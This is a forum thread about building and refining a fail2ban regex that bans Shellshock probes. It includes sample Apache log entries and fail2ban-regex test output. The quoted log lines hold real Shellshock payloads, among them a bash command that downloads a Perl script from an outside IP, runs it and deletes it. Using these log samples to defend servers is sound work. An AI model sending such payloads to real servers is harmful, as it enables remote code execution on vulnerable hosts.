HowTo: Shellschock fail2ban filter

Habitual

HowTo: Shellschock fail2ban filter

Post by Habitual »

I wrote this today, using fail2ban 0.8.10, so YMWV:
9 samples in /var/log/test.log

Code:

89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
and the filter in /etc/fail2ban/filter.d/shellshock.conf

Code:

[Definition]

docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
Props to IBBoard

Testing:

Code:

fail2ban-regex /var/log/test.log  /etc/fail2ban/filter.d/shellshock.conf
Results:

Code:

Summary
=======

Addresses found:
[1]
    89.207.135.125 (Thu Sep 25 04:14:19 2014)
    198.20.69.74 (Thu Sep 25 17:42:32 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)

Date template hits:
18 hit(s): Day/MONTH/Year:Hour:Minute:Second

Success, the total number of match is 9
On Fail2Ban v0.8.10

Enjoy the Goodness!
Last edited by Habitual on Sat Sep 27, 2014 1:53 pm, edited 2 times in total.
IBBoard

Re: HowTo: Shellschock fail2ban filter

Post by IBBoard »

I was looking for Fail2ban Shellshock regexes, and this post ranks quite highly on Google at the moment. While it will work, I think you've cast your RegEx net FAR too wide and you're going to cripple some people's websites.

Actually use cgi-bin (e.g. for AWStats)? You'll get banned. Post an article with "ping", "bash" or "wget" anywhere in the URL (including in the middle of phrases like "shopping")? You're going to get people banned. Got a referral from some other site that is out of your control that has those words anywhere in the URL? You're going to get people banned. Got a bot that visits that legitimately uses any of those words in its user agent (such as a link to a "scraping policy")? They'll get banned.

I've just tested this one on my logs and I think it is a bit safer and slightly more proof against variants:

Code:

<HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
Basically, it looks for the function creation that is the actual Shellshock vulnerability, rather than what they're trying to do with it. It allows variable amounts of white space (because if I was exploiting this then that'd be my obvious first attempt to bypass filters) and it makes sure that it all occurs inside a single field in the Apache log (by doing "zero/one or more characters that aren't a quote").

If anyone has any suggestions for improving this, or can spot any issues or anything it misses, feel free to give me a shout and/or improve it.
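To make the difference between the two approaches in this thread concrete (the original post's test run with fail2ban-regex, and IBBoard's point that matching the "() { ... };" function definition inside one quoted field is safer than a keyword net), here is an added Python example; it is not code from the thread or from fail2ban. It expands <HOST> the way fail2ban 0.8 does (that expansion is reproduced from memory and is an assumption), the keyword filter is a constructed stand-in for the wider regex IBBoard describes, and the sample log lines and addresses are constructed.

```python
import re

# fail2ban substitutes <HOST> with a named group before compiling; this is the
# 0.8-era expansion, reproduced from memory (assumption, not copied from fail2ban).
HOST = r"(?:::f{4,6}:)?(?P<host>[\w\-.^_]*\w)"

# IBBoard's filter from the thread: match the "() { ... };" function definition
# inside a single quoted Apache log field, rather than keywords like ping/wget.
SHELLSHOCK_RE = re.compile(HOST + r'.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+')

# Constructed stand-in for the keyword-style net the thread warns against.
KEYWORD_RE = re.compile(HOST + r".*(?:ping|bash|wget)")

# Constructed sample lines: two probes (the second with extra whitespace) and
# three benign requests that merely contain the keywords in URL, referrer or UA.
SAMPLE_LOG = r'''
203.0.113.10 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/ping -c 1 203.0.113.99"
203.0.113.11 - - [25/Sep/2014:04:15:02 -0400] "GET / HTTP/1.1" 200 288 "-" "(  )  {  :;  }  ;  /bin/ping -c 1 203.0.113.99"
198.51.100.5 - - [25/Sep/2014:05:00:00 -0400] "GET /shopping/cart HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.6 - - [25/Sep/2014:05:01:00 -0400] "GET /cgi-bin/awstats.pl HTTP/1.1" 200 5120 "http://example.com/bash-tips" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:05:02:00 -0400] "GET /robots.txt HTTP/1.1" 200 60 "-" "ExampleBot/1.0 (+http://example.com/wget-scraping-policy)"
'''.strip().splitlines()


def matched_hosts(pattern, lines):
    """Return the host captured by `pattern` for each line it matches, in the
    spirit of fail2ban-regex's "Addresses found" list (order kept, duplicates kept)."""
    hits = []
    for line in lines:
        m = pattern.search(line)
        if m:
            hits.append(m.group("host"))
    return hits


def compare(lines=SAMPLE_LOG):
    """Run both filters over the sample; returns (shellshock_hits, keyword_hits)."""
    return matched_hosts(SHELLSHOCK_RE, lines), matched_hosts(KEYWORD_RE, lines)


if __name__ == "__main__":
    ss, kw = compare()
    print("function-definition filter would ban:", ss)  # only the two probes
    print("keyword filter would ban:", kw)              # also the three benign hosts
```

Swap in your own access log lines for SAMPLE_LOG to see which legitimate requests a keyword filter would have banned on your site.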
Habitual

Re: HowTo: Shellschock fail2ban filter

Post by Habitual »

Yeah, I suck at RegEx

I tested your new failregex using

Code:

198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
198.20.69.75 - - [25/Sep/2014:17:42:32 -0400] "POST / HTTP/1.1" 200 288 "() { :; }; anything here
and it found it. Great Tip, thanks!

Original post updated with credit.